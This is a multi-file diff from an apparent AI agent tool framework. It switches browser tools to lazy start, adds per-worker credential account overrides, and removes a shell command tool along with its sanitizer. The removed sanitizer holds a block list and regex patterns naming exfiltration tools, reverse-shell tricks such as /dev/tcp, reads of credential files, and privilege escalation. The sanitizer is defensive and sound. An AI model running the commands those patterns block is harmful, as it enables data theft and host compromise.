1. **Queen's default tool surface changed.** If you have a queen profile pinned to a removed tool (e.g. `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, the old `execute_command_tool`), it'll fall back to the consolidated replacements. Custom profiles referencing those tool names should be updated.
2. **Old `queen_lifecycle_tools` entries are gone.** If you wired any external code against those defaults, switch to the new task system.
3. **Task plan is now persistent.** Queen will start staging a plan automatically on new sessions — if you don't want the panel, you can collapse it from the layout.
Plan the work. Chart the result. 🐝
+1 -1
View File
@@ -334,7 +334,7 @@ Update incrementally — do not rewrite from scratch each time.
**Background:** Replaces the older in-memory `_batch_ledger` (and `_working_notes → Current Plan` decomposition) — both were removed on 2026-04-15 because they duplicated state that belongs in SQLite. The queue, per-task `steps` decomposition, and `sop_checklist` hard-gates now all live in `progress.db` and are authoritative.
**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `execute_command_tool`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.
**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `terminal_exec`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.
**Tables:**
- `tasks` — queue: pending → claimed → done|failed, with `worker_id` and atomic claim tokens
@@ -17,16 +17,15 @@ map_search_gcu = NodeSpec(
You are a browser agent. Your job: Search Google Maps for the provided query and extract business names and website URLs.
## Workflow
1. browser_start
2. browser_open(url="https://www.google.com/maps")
3. use the url query to search for the keyword
3.1 alternatively, use browser_type or browser_click to search for the "query" in memory.'
4. browser_wait(seconds=3)
5. browser_snapshot to find the list of results.
6. For each relevant result, extract:
1. browser_open(url="https://www.google.com/maps") # lazy-creates the context
2. use the url query to search for the keyword
2.1 alternatively, use browser_type or browser_click to search for the "query" in memory.'
3. browser_wait(seconds=3)
4. browser_snapshot to find the list of results.
5. For each relevant result, extract:
- Name of the business
- Website URL (look for the website icon/link)
7. set_output("business_list", [{"name": "...", "website": "..."}, ...])
6. set_output("business_list", [{"name": "...", "website": "..."}, ...])
## Constraints
- Extract at least 5-10 businesses if possible.
@@ -24,13 +24,12 @@ Focus on:
- Hardware/Silicon breakthroughs
## Instructions
1. browser_start
2. For each handle:
a. browser_open(url=f"https://x.com/{handle}")
1. For each handle:
a. browser_open(url=f"https://x.com/{handle}") # lazy-creates the context on first call
b. browser_wait(seconds=5)
c. browser_snapshot
d. Parse relevant tech news text
3. set_output("raw_tweets", consolidated_json)
2. set_output("raw_tweets", consolidated_json)
""",
)
+6 -4
View File
@@ -244,12 +244,14 @@ def main() -> None:
logger.error("Failed to connect to GCU server: %s", e)
sys.exit(1)
# Auto-start browser context so tools work immediately
# Warm the browser context so the first interactive call doesn't pay the
# cold-start round trip. about:blank lazy-creates the context just like
# a real URL would, without committing to a destination page.
try:
result = client.call_tool("browser_start", {})
logger.info("browser_start: %s", result)
result = client.call_tool("browser_open", {"url": "about:blank"})
logger.info("browser_open(about:blank): %s", result)
except Exception as e:
logger.warning("browser_start failed (may already be started): %s", e)
logger.warning("browser warm-up failed (may already be running): %s", e)
app = create_app()
+1 -1
View File
@@ -457,7 +457,7 @@ let currentView = 'grid';
// Tool categories for sidebar grouping
const CATEGORIES = {
'Lifecycle': ['browser_setup', 'browser_start', 'browser_stop', 'browser_status'],
'Lifecycle': ['browser_setup', 'browser_stop', 'browser_status'],
'Tabs': ['browser_tabs', 'browser_open', 'browser_close', 'browser_close_all', 'browser_close_finished', 'browser_activate_tab'],
'Navigation': ['browser_navigate', 'browser_go_back', 'browser_go_forward', 'browser_reload'],
'Interactions': ['browser_click', 'browser_click_coordinate', 'browser_type', 'browser_type_focused', 'browser_press', 'browser_press_at', 'browser_hover', 'browser_hover_coordinate', 'browser_select', 'browser_scroll', 'browser_drag'],
+2 -8
View File
@@ -72,10 +72,7 @@ verbatim; system + credential paths are on a deny list).
| `read_file` | Read file contents (with optional hashline anchors) |
| `write_file` | Create or overwrite a file |
| `edit_file` | Find/replace with fuzzy fallback |
| `hashline_edit` | Anchor-based structural edits validated by line hashes |
| `apply_patch` | Apply a diff_match_patch text |
| `search_files` | Grep file contents (`target='content'`) or list/find files (`target='files'`) — replaces grep, find, and ls |
| `execute_command_tool` | Execute shell commands |
| `save_data` / `load_data` | Persist and retrieve structured data across steps |
| `serve_file_to_user` | Serve a file for the user to download |
| `list_data_files` | List persisted data files in the session |
@@ -176,11 +173,8 @@ tools/
│ ├── file_ops.py # ALL file tools (read, write, edit, hashline_edit, search_files, apply_patch)
│ ├── credentials/ # Credential management
│ └── tools/ # Tool implementations
│ ├── example_tool/
├── file_system_toolkits/ # Shell only — file tools moved to file_ops.py
│ │ ├── security.py
│ │ ├── command_sanitizer.py
│ │ └── execute_command_tool/
│ ├── file_system_toolkits/ # Sandbox path helpers (security.py)
│ └── security.py
│ ├── web_search_tool/
│ ├── web_scrape_tool/
│ ├── pdf_read_tool/
+1 -1
View File
@@ -61,7 +61,7 @@ All replies carry `{ id, result }` or `{ id, error }`.
# 1. At GCU server startup, open ws://localhost:9229/beeline and wait for
# the extension to connect (sends { type: "hello" }).
#
# 2. On browser_start(profile):
# 2. On the first browser tool call for a profile (lazy-start via _ensure_context):
# - Send { id, type: "context.create", agentId: profile }
# - Receive { groupId, tabId }
# - Store groupId in the session object (no Chrome process, no CDP port)
+2 -1
View File
@@ -35,7 +35,8 @@ GITHUB_CREDENTIALS = {
help_url="https://github.com/settings/tokens",
description="GitHub Personal Access Token (classic)",
# Auth method support
aden_supported=False,
aden_supported=True,
aden_provider_name="github",
direct_api_key_supported=True,
api_key_instructions="""To get a GitHub Personal Access Token:
1. Go to GitHub Settings > Developer settings > Personal access tokens
@@ -29,6 +29,8 @@ NOTION_CREDENTIALS = {
startup_required=False,
help_url="https://www.notion.so/my-integrations",
description="Notion internal integration token",
aden_supported=True,
aden_provider_name="notion",
direct_api_key_supported=True,
api_key_instructions="""To set up Notion API access:
1. Go to https://www.notion.so/my-integrations
+1 -1
View File
@@ -67,7 +67,7 @@ SLACK_CREDENTIALS = {
help_url="https://api.slack.com/apps",
description="Slack Bot Token (starts with xoxb-)",
# Auth method support
aden_supported=False,
aden_supported=True,
aden_provider_name="slack",
direct_api_key_supported=True,
api_key_instructions="""To get a Slack Bot Token:
@@ -26,6 +26,8 @@ Usage:
from __future__ import annotations
from contextlib import contextmanager
from contextvars import ContextVar
from typing import TYPE_CHECKING, Any
from .base import CredentialError, CredentialSpec
@@ -34,6 +36,36 @@ if TYPE_CHECKING:
from framework.credentials import CredentialStore
# Worker profiles inject their per-provider account aliases into this
# ContextVar before each tool turn. When a tool calls
# ``credentials.get_by_alias(provider, "")`` (or ``credentials.get(name)``),
# the adapter consults the map and, if the provider has a binding, uses
# that alias for the lookup. An explicit non-empty alias on the call wins.
# Keys are credential ids (matching ``CredentialSpec.credential_id``);
# values are the account alias to route to.
_active_account_overrides: ContextVar[dict[str, str] | None] = ContextVar(
"hive_credential_account_overrides", default=None
)
@contextmanager
def account_overrides(overrides: dict[str, str] | None):
"""Bind ``overrides`` for the duration of the ``with`` block.
Used by the colony runtime to pin a worker's MCP tool calls to its
profile's aliases. Empty / ``None`` is a no-op so callers can safely
pass through unbound profiles without conditional logic.
"""
if not overrides:
yield
return
token = _active_account_overrides.set(dict(overrides))
try:
yield
finally:
_active_account_overrides.reset(token)
# Process-wide memoization for CredentialStoreAdapter.default().
#
# Without this, every caller (e.g. each MCP server registration in
@@ -127,6 +159,19 @@ class CredentialStoreAdapter:
if name not in self._specs:
raise KeyError(f"Unknown credential '{name}'. Available: {list(self._specs.keys())}")
if account is None:
# No explicit caller-supplied alias — check whether the active
# worker profile has pinned this credential to a specific
# account. Falls through to the unaliased default lookup when
# no profile binding exists.
overrides = _active_account_overrides.get()
if overrides:
bound_alias = overrides.get(name)
if bound_alias:
aliased = self.get_by_alias(name, bound_alias)
if aliased is not None:
return aliased
if account is not None:
try:
from framework.credentials.local.registry import LocalCredentialRegistry
@@ -364,10 +409,23 @@ class CredentialStoreAdapter:
def get_by_alias(self, provider_name: str, alias: str) -> str | None:
"""Resolve a specific account's token by alias.
When ``alias`` is empty, falls back to the active worker profile's
binding (if any). MCP tools default ``account=""`` so this lets a
worker profile pin a default account without requiring the agent
to supply it on every call.
Raises:
CredentialExpiredError: If the matched credential is expired and
refresh failed.
"""
if not alias:
overrides = _active_account_overrides.get()
if overrides:
bound_alias = overrides.get(provider_name)
if bound_alias:
alias = bound_alias
if not alias:
return None
cred = self._store.get_credential_by_alias(provider_name, alias)
if cred is None:
return None
@@ -584,7 +642,7 @@ class CredentialStoreAdapter:
# Use 5-second timeout to avoid blocking on slow/failed requests
client = AdenCredentialClient(
AdenClientConfig(
base_url=os.environ.get("ADEN_API_URL", "https://api.adenhq.com"),
base_url=os.environ.get("ADEN_API_URL", "https://app.open-hive.com"),
timeout=5.0,
)
)
+12 -42
View File
@@ -22,13 +22,11 @@ Usage:
from __future__ import annotations
import contextlib
import difflib
import fnmatch
import os
import re
import subprocess
import sys
import threading as _threading
from collections.abc import Callable
from dataclasses import dataclass, field
@@ -924,8 +922,7 @@ def _apply_hunk(content: str, hunk: _Hunk) -> tuple[str, str | None]:
count = content.count(hunk.context_hint)
if count > 1:
return content, (
f"addition-only hunk: context hint "
f"'{hunk.context_hint}' is ambiguous ({count} occurrences)"
f"addition-only hunk: context hint '{hunk.context_hint}' is ambiguous ({count} occurrences)"
)
if count == 1:
idx = content.find(hunk.context_hint)
@@ -1045,9 +1042,7 @@ def _apply_v4a(
for hunk_idx, hunk in enumerate(op.hunks):
new_content, herr = _apply_hunk(content, hunk)
if herr:
errors.append(
f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}"
)
errors.append(f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}")
break
content = new_content
fs_state[resolved] = content
@@ -1063,9 +1058,7 @@ def _apply_v4a(
errors.append(f"Op #{op_idx + 1} move {op.path}: {err}")
continue
if os.path.exists(dst_resolved) and fs_exists.get(dst_resolved, True):
errors.append(
f"Op #{op_idx + 1} move {op.path}: destination already exists"
)
errors.append(f"Op #{op_idx + 1} move {op.path}: destination already exists")
continue
fs_state[dst_resolved] = fs_state[resolved]
fs_exists[dst_resolved] = True
@@ -1121,8 +1114,7 @@ def _apply_v4a(
if apply_errors:
return None, (
"Apply phase failed (state may be inconsistent — run `git diff` to assess):\n "
+ "\n ".join(apply_errors)
"Apply phase failed (state may be inconsistent — run `git diff` to assess):\n " + "\n ".join(apply_errors)
)
summary_parts: list[str] = []
@@ -1177,10 +1169,7 @@ def _patch_replace(
f"harness can track its state before you edit it."
)
if _fresh.status is Freshness.STALE:
return (
f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with "
f"read_file before editing."
)
return f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with read_file before editing."
try:
with open(resolved, encoding="utf-8") as f:
@@ -1217,9 +1206,7 @@ def _patch_replace(
break
if matched is None:
close = difflib.get_close_matches(
old_string[:200], content.split("\n"), n=3, cutoff=0.4
)
close = difflib.get_close_matches(old_string[:200], content.split("\n"), n=3, cutoff=0.4)
msg = (
f"Error: Could not find a unique match for old_string in {path}. "
f"Use read_file to verify the current content, or search_files "
@@ -1352,14 +1339,8 @@ EDIT_FILE_PARAMS = {
"tabs vs spaces, smart quotes vs ASCII, and literal \\n/\\t/\\r "
"vs real control chars."
),
"new_string": (
"Replace mode only. Replacement text. Pass an empty string to "
"delete the matched text."
),
"replace_all": (
"Replace mode only. Replace every occurrence instead of requiring "
"a unique match. Default False."
),
"new_string": ("Replace mode only. Replacement text. Pass an empty string to delete the matched text."),
"replace_all": ("Replace mode only. Replace every occurrence instead of requiring a unique match. Default False."),
"patch_text": (
"Patch mode only. Structured patch body. File paths are embedded "
"inside the body via '*** Update File: <path>' / "
@@ -1396,18 +1377,14 @@ SEARCH_FILES_DOC = (
)
SEARCH_FILES_PARAMS = {
"pattern": (
"Regex (content mode) or glob (files mode, e.g. '*.py'). For an "
"'ls'-style listing pass '*' or '*.<ext>'."
"Regex (content mode) or glob (files mode, e.g. '*.py'). For an 'ls'-style listing pass '*' or '*.<ext>'."
),
"target": (
"'content' to grep inside files, 'files' to list/find files. "
"Legacy aliases: 'grep' -> 'content', 'find'/'ls' -> 'files'. "
"Default 'content'."
),
"path": (
"Directory (or, in content mode, a single file) to search. "
"Default '.'."
),
"path": ("Directory (or, in content mode, a single file) to search. Default '.'."),
"file_glob": (
"Restrict content search to filenames matching this glob. "
"Ignored in files mode (use the 'pattern' argument instead)."
@@ -1419,14 +1396,8 @@ SEARCH_FILES_PARAMS = {
"default), 'files_only' (paths only), 'count' (per-file match "
"counts)."
),
"context": (
"Lines of context before and after each match (content mode "
"only). Default 0."
),
"hashline": (
"Content mode: include N:hhhh hash anchors in matched lines. "
"Default False."
),
"context": ("Lines of context before and after each match (content mode only). Default 0."),
"hashline": ("Content mode: include N:hhhh hash anchors in matched lines. Default False."),
"task_id": (
"Optional anti-loop scope key. Defaults to a shared bucket; pass "
"a per-task id when multiple agents share a process."
@@ -1719,4 +1690,3 @@ def register_file_tools(
"Results have not changed — use what you have instead of re-searching.]"
)
return result
-6
View File
@@ -59,11 +59,7 @@ from .docker_hub_tool import register_tools as register_docker_hub
from .duckduckgo_tool import register_tools as register_duckduckgo
from .email_tool import register_tools as register_email
from .exa_search_tool import register_tools as register_exa_search
from .example_tool import register_tools as register_example
from .excel_tool import register_tools as register_excel
from .file_system_toolkits.execute_command_tool import (
register_tools as register_execute_command,
)
from .freshdesk_tool import register_tools as register_freshdesk
from .github_tool import register_tools as register_github
from .gitlab_tool import register_tools as register_gitlab
@@ -157,7 +153,6 @@ def _register_verified(
"""Register verified (stable) tools."""
_verified_before = set(mcp._tool_manager._tools.keys())
# --- No credentials ---
register_example(mcp)
if register_web_scrape:
register_web_scrape(mcp)
register_pdf_read(mcp)
@@ -199,7 +194,6 @@ def _register_verified(
# defaults to CWD here; framework callers that own a session-specific
# workspace should call register_file_tools directly with home set.
register_file_tools(mcp)
register_execute_command(mcp)
register_csv(mcp)
register_excel(mcp)
@@ -1,26 +0,0 @@
# Example Tool
A template tool demonstrating the Aden tools pattern.
## Description
This tool processes text messages with optional transformations. It serves as a reference implementation for creating new tools using the FastMCP decorator pattern.
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `message` | str | Yes | - | The message to process (1-1000 chars) |
| `uppercase` | bool | No | `False` | Convert message to uppercase |
| `repeat` | int | No | `1` | Number of times to repeat (1-10) |
## Environment Variables
This tool does not require any environment variables.
## Error Handling
Returns error strings for validation issues:
- `Error: message must be 1-1000 characters` - Empty or too long message
- `Error: repeat must be 1-10` - Repeat value out of range
- `Error processing message: <error>` - Unexpected error
@@ -1,5 +0,0 @@
"""Example Tool package."""
from .example_tool import register_tools
__all__ = ["register_tools"]
@@ -1,52 +0,0 @@
"""
Example Tool - A simple text processing tool for FastMCP.
Demonstrates native FastMCP tool registration pattern.
"""
from __future__ import annotations
from fastmcp import FastMCP
def register_tools(mcp: FastMCP) -> None:
"""Register example tools with the MCP server."""
@mcp.tool()
def example_tool(
message: str,
uppercase: bool = False,
repeat: int = 1,
) -> str:
"""
A simple example tool that processes text messages.
Use this tool when you need to transform or repeat text.
Args:
message: The message to process (1-1000 chars)
uppercase: If True, convert the message to uppercase
repeat: Number of times to repeat the message (1-10)
Returns:
The processed message string
"""
try:
# Validate inputs
if not message or len(message) > 1000:
return "Error: message must be 1-1000 characters"
if repeat < 1 or repeat > 10:
return "Error: repeat must be 1-10"
# Process the message
result = message
if uppercase:
result = result.upper()
# Repeat if requested
if repeat > 1:
result = " ".join([result] * repeat)
return result
except Exception as e:
return f"Error processing message: {str(e)}"
@@ -1,16 +1,15 @@
# File System Toolkits (post-consolidation)
This package now contains only the shell tool. **All file tools live in
`aden_tools.file_ops`** (read_file, write_file, edit_file, hashline_edit,
search_files, apply_patch) — they share one path policy and one home dir.
This package contains only sandbox path helpers used by `csv_tool` and
`excel_tool`. **All file tools live in `aden_tools.file_ops`** (read_file,
write_file, edit_file, hashline_edit, search_files, apply_patch) — they
share one path policy and one home dir.
## Sub-modules
| Module | Description |
|--------|-------------|
| `execute_command_tool/` | Shell command execution with sanitization (run_command, bash_kill, bash_output) |
| `command_sanitizer.py` | Validates and sanitizes shell command strings |
| `security.py` | Sandbox path resolver still used by execute_command_tool |
| `security.py` | Sandbox path resolver used by csv_tool and excel_tool |
## File tools
@@ -31,11 +30,3 @@ from aden_tools.file_ops import register_file_tools
register_file_tools(mcp, home="/path/to/agent/home")
```
For shell:
```python
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools as register_shell
register_shell(mcp)
```
@@ -1,202 +0,0 @@
"""Command sanitization to prevent shell injection attacks.
Validates commands against a blocklist of dangerous patterns before they
are passed to subprocess.run(shell=True). This prevents prompt injection
attacks from tricking AI agents into running destructive or exfiltration
commands on the host system.
Design: uses a blocklist (not allowlist) so agents can run arbitrary
dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
but callers still execute via shell=True, so shell parsing remains a
known limitation of this guardrail.
"""
import re
__all__ = ["CommandBlockedError", "validate_command"]
class CommandBlockedError(Exception):
"""Raised when a command is blocked by the safety filter."""
pass
# ---------------------------------------------------------------------------
# Blocklists
# ---------------------------------------------------------------------------
# Executables / prefixes that are never safe for an AI agent to invoke.
# Matched against each segment of a compound command (split on ; | && ||).
_BLOCKED_EXECUTABLES: list[str] = [
# Network exfiltration
"wget",
"nc",
"ncat",
"netcat",
"nmap",
"ssh",
"scp",
"sftp",
"ftp",
"telnet",
"rsync",
# Windows network tools
"invoke-webrequest",
"invoke-restmethod",
"iwr",
"irm",
"certutil",
# User / privilege escalation
"useradd",
"userdel",
"usermod",
"adduser",
"deluser",
"passwd",
"chpasswd",
"visudo",
"net", # net user, net localgroup, etc.
# System destructive
"shutdown",
"reboot",
"halt",
"poweroff",
"init",
"systemctl",
"mkfs",
"fdisk",
"diskpart",
"format", # Windows format
# Reverse shell / code exec wrappers
"bash",
"sh",
"zsh",
"dash",
"csh",
"ksh",
"powershell",
"pwsh",
"cmd",
"cmd.exe",
"wscript",
"cscript",
"mshta",
"regsvr32",
# Credential / secret access
"security", # macOS keychain: security find-generic-password
]
# Patterns matched against the full (joined) command string.
# These catch dangerous flags and argument combos even when the
# executable itself isn't blocked (e.g. python -c '...').
_BLOCKED_PATTERNS: list[re.Pattern[str]] = [
# rm with force/recursive flags targeting root or broad paths
re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
# del /s /q (Windows recursive delete)
re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
# dd writing to disks/partitions
re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
# chmod 777 / chmod -R 777
re.compile(r"\bchmod\s+(-R\s+)?(777|666)\b", re.IGNORECASE),
# sudo — agents should never escalate privileges
re.compile(r"\bsudo\b", re.IGNORECASE),
# su — switch user
re.compile(r"\bsu\s+", re.IGNORECASE),
# ruby/perl with -e flag (inline code execution)
re.compile(r"\bruby\s+-e\b", re.IGNORECASE),
re.compile(r"\bperl\s+-e\b", re.IGNORECASE),
# powershell encoded commands
re.compile(r"\bpowershell\b.*-enc", re.IGNORECASE),
# Reverse shell patterns
re.compile(r"/dev/tcp/", re.IGNORECASE),
re.compile(r"\bmkfifo\b", re.IGNORECASE),
# eval / exec as standalone commands
re.compile(r"^\s*eval\s+", re.IGNORECASE | re.MULTILINE),
re.compile(r"^\s*exec\s+", re.IGNORECASE | re.MULTILINE),
# Reading well-known secret files
re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
# Backtick or $() command substitution containing blocked executables
re.compile(r"\$\(.*\b(wget|nc|ncat)\b.*\)", re.IGNORECASE),
re.compile(r"`.*\b(wget|nc|ncat)\b.*`", re.IGNORECASE),
# Environment variable exfiltration via echo/print
re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
# >& /dev/tcp (bash reverse shell)
re.compile(r">&\s*/dev/tcp", re.IGNORECASE),
]
# Shell operators used to split compound commands.
# We check each segment individually against _BLOCKED_EXECUTABLES.
_SHELL_SPLIT_PATTERN = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
def _normalize_executable_name(token: str) -> str:
"""Normalize executable names for matching (e.g. cmd.exe -> cmd)."""
normalized = token.lower().strip("\"'")
normalized = re.split(r"[\\/]", normalized)[-1]
if normalized.endswith(".exe"):
return normalized[:-4]
return normalized
def _extract_executable(segment: str) -> str:
"""Extract the first token (executable) from a command segment.
Strips environment variable assignments (FOO=bar) from the front.
"""
segment = segment.strip()
# Skip env var assignments at the start: VAR=value cmd ...
tokens = segment.split()
for token in tokens:
if "=" in token and not token.startswith("-"):
continue
# Return lowercase for case-insensitive matching
return _normalize_executable_name(token)
return ""
def validate_command(command: str) -> None:
"""Validate a command string against the safety blocklists.
Args:
command: The shell command string to validate.
Raises:
CommandBlockedError: If the command matches any blocked pattern.
"""
if not command or not command.strip():
return
stripped = command.strip()
# --- Check full-command patterns ---
for pattern in _BLOCKED_PATTERNS:
match = pattern.search(stripped)
if match:
raise CommandBlockedError(
f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
f"If this is a false positive, please modify the command."
)
# --- Check each segment for blocked executables ---
segments = _SHELL_SPLIT_PATTERN.split(stripped)
for segment in segments:
segment = segment.strip()
if not segment:
continue
executable = _extract_executable(segment)
# Check exact match and prefix-before-dot (e.g. mkfs.ext4 -> mkfs)
names_to_check = {executable}
if "." in executable:
names_to_check.add(executable.split(".")[0])
if names_to_check & set(_BLOCKED_EXECUTABLES):
matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
raise CommandBlockedError(
f"Command blocked for safety: '{matched}' is not allowed. "
f"Blocked categories: network tools, privilege escalation, "
f"system destructive commands, shell interpreters."
)
@@ -1,152 +0,0 @@
# Execute Command Tool
Executes shell commands within the secure session sandbox.
## Description
The `execute_command_tool` allows you to run arbitrary shell commands in a sandboxed environment. Commands are executed with a 60-second timeout and capture both stdout and stderr output.
## Use Cases
- Running build commands (npm build, make, etc.)
- Executing tests
- Running linters or formatters
- Performing git operations
- Installing dependencies
## Usage
```python
execute_command_tool(
command="npm install",
workspace_id="workspace-123",
agent_id="agent-456",
session_id="session-789",
cwd="project"
)
```
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `command` | str | Yes | - | The shell command to execute |
| `workspace_id` | str | Yes | - | The ID of the workspace |
| `agent_id` | str | Yes | - | The ID of the agent |
| `session_id` | str | Yes | - | The ID of the current session |
| `cwd` | str | No | "." | The working directory for the command (relative to session root) |
## Returns
Returns a dictionary with the following structure:
**Success:**
```python
{
"success": True,
"command": "npm install",
"return_code": 0,
"stdout": "added 42 packages in 3s",
"stderr": "",
"cwd": "project"
}
```
**Command failure (non-zero exit):**
```python
{
"success": True, # Command executed successfully, but exited with error code
"command": "npm test",
"return_code": 1,
"stdout": "",
"stderr": "Error: Tests failed",
"cwd": "."
}
```
**Timeout:**
```python
{
"error": "Command timed out after 60 seconds"
}
```
**Error:**
```python
{
"error": "Failed to execute command: [error message]"
}
```
## Error Handling
- Returns an error dict if the command times out (60 second limit)
- Returns an error dict if the command cannot be executed
- Returns success with non-zero return_code if command runs but fails
- Commands are executed in a sandboxed session environment
- Working directory defaults to session root if not specified
## Security Considerations
- Commands are executed within the session sandbox only
- File access is restricted to the session directory
- Network access depends on sandbox configuration
- Commands run with the permissions of the session user
- Use with caution as shell injection is possible
## Examples
### Running a build command
```python
result = execute_command_tool(
command="npm run build",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="frontend"
)
# Returns: {"success": True, "return_code": 0, "stdout": "Build complete", ...}
```
### Running tests with output
```python
result = execute_command_tool(
command="pytest -v",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 0, "stdout": "test output...", "stderr": ""}
```
### Handling command failures
```python
result = execute_command_tool(
command="nonexistent-command",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 127, "stderr": "command not found", ...}
```
### Running git commands
```python
result = execute_command_tool(
command="git status",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="repo"
)
# Returns: {"success": True, "return_code": 0, "stdout": "On branch main...", ...}
```
## Notes
- 60-second timeout for all commands
- Commands are executed using shell=True (supports pipes, redirects, etc.)
- Both stdout and stderr are captured separately
- Return code 0 typically indicates success
- Working directory is created if it doesn't exist
- Command output is returned as text (UTF-8 encoding)
@@ -1,3 +0,0 @@
from .execute_command_tool import register_tools
__all__ = ["register_tools"]
@@ -1,211 +0,0 @@
"""In-process registry of long-running shell jobs spawned by
``execute_command_tool(run_in_background=True)``.
Jobs are keyed on a short id the tool returns to the agent. The agent
can then call ``bash_output(id=...)`` to poll for new output and
``bash_kill(id=...)`` to terminate. Each job is scoped to an
``agent_id`` so two agents sharing the same MCP server can't see or
kill each other's work.
The stdout/stderr buffers are bounded rolling tail buffers (64 KB each)
so a runaway process can't exhaust memory. Older bytes are dropped with
a one-time ``[truncated N bytes]`` marker prepended to the returned
text.
"""
from __future__ import annotations
import asyncio
import time
from collections import deque
from dataclasses import dataclass, field
from uuid import uuid4
# 64 KB rolling window per stream. Large enough for long build logs,
# small enough that a bash infinite loop can't OOM the MCP process.
_MAX_BUFFER_BYTES = 64 * 1024
@dataclass
class _RingBuffer:
"""Append-only byte buffer with a hard byte ceiling and per-read
offset tracking so each bash_output call only returns new bytes.
"""
max_bytes: int = _MAX_BUFFER_BYTES
# deque of (global_offset, bytes) chunks. global_offset is the total
# bytes written prior to this chunk; lets us compute "bytes since
# last poll" without copying.
_chunks: deque[tuple[int, bytes]] = field(default_factory=deque)
_total_written: int = 0
_total_dropped: int = 0
_read_cursor: int = 0
def write(self, data: bytes) -> None:
if not data:
return
self._chunks.append((self._total_written, data))
self._total_written += len(data)
# Evict from the front until we're under the ceiling.
current_bytes = sum(len(c) for _, c in self._chunks)
while current_bytes > self.max_bytes and self._chunks:
dropped_offset, dropped = self._chunks.popleft()
self._total_dropped += len(dropped)
current_bytes -= len(dropped)
# Push the read cursor forward if the reader was still
# pointing at bytes we just evicted.
if self._read_cursor < dropped_offset + len(dropped):
self._read_cursor = dropped_offset + len(dropped)
def read_new(self) -> str:
"""Return any bytes since the last call, as decoded text.
Includes a ``[truncated N bytes]`` prefix if rolling-window
eviction dropped any bytes the reader hadn't yet consumed.
"""
chunks_out: list[bytes] = []
cursor = self._read_cursor
for offset, chunk in self._chunks:
end = offset + len(chunk)
if end <= cursor:
continue
start_in_chunk = max(0, cursor - offset)
chunks_out.append(chunk[start_in_chunk:])
cursor = end
self._read_cursor = cursor
raw = b"".join(chunks_out)
text = raw.decode("utf-8", errors="replace")
# Surface eviction ONCE per poll so the agent knows to check
# the file system for larger logs instead of assuming it's got
# the full output.
if self._total_dropped > 0 and text:
text = f"[truncated {self._total_dropped} earlier bytes]\n" + text
return text
@dataclass
class BackgroundJob:
id: str
agent_id: str
command: str
cwd: str
started_at: float
process: asyncio.subprocess.Process
stdout_buf: _RingBuffer = field(default_factory=_RingBuffer)
stderr_buf: _RingBuffer = field(default_factory=_RingBuffer)
_pump_task: asyncio.Task | None = None
exit_code: int | None = None
def status(self) -> str:
if self.exit_code is not None:
return f"exited({self.exit_code})"
if self.process.returncode is not None:
# Not yet surfaced by the pump but already finished.
return f"exited({self.process.returncode})"
return "running"
# agent_id -> {job_id -> BackgroundJob}
_jobs: dict[str, dict[str, BackgroundJob]] = {}
_jobs_lock = asyncio.Lock()
def _short_id() -> str:
return uuid4().hex[:8]
async def _pump(job: BackgroundJob) -> None:
"""Drain the child process's stdout/stderr into the ring buffers."""
proc = job.process
async def _drain(stream: asyncio.StreamReader | None, buf: _RingBuffer) -> None:
if stream is None:
return
while True:
chunk = await stream.read(4096)
if not chunk:
return
buf.write(chunk)
await asyncio.gather(
_drain(proc.stdout, job.stdout_buf),
_drain(proc.stderr, job.stderr_buf),
)
job.exit_code = await proc.wait()
async def spawn(command: str, cwd: str, agent_id: str) -> BackgroundJob:
"""Start a subprocess in the background and register it. The caller
holds the job id returned from here and can poll via ``get()``.
"""
proc = await asyncio.create_subprocess_shell(
command,
cwd=cwd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
job = BackgroundJob(
id=_short_id(),
agent_id=agent_id,
command=command,
cwd=cwd,
started_at=time.time(),
process=proc,
)
# Start pumping IO in the background so the ring buffers stay warm
# even if the agent doesn't poll for a while.
job._pump_task = asyncio.create_task(_pump(job))
async with _jobs_lock:
_jobs.setdefault(agent_id, {})[job.id] = job
return job
async def get(agent_id: str, job_id: str) -> BackgroundJob | None:
async with _jobs_lock:
return _jobs.get(agent_id, {}).get(job_id)
async def kill(agent_id: str, job_id: str, grace_seconds: float = 3.0) -> str:
"""SIGTERM a background job, escalating to SIGKILL after a grace
period. Returns a human-readable status string.
"""
job = await get(agent_id, job_id)
if job is None:
return f"no background job with id '{job_id}'"
if job.process.returncode is not None:
status = f"already exited with code {job.process.returncode}"
else:
try:
job.process.terminate()
except ProcessLookupError:
pass
try:
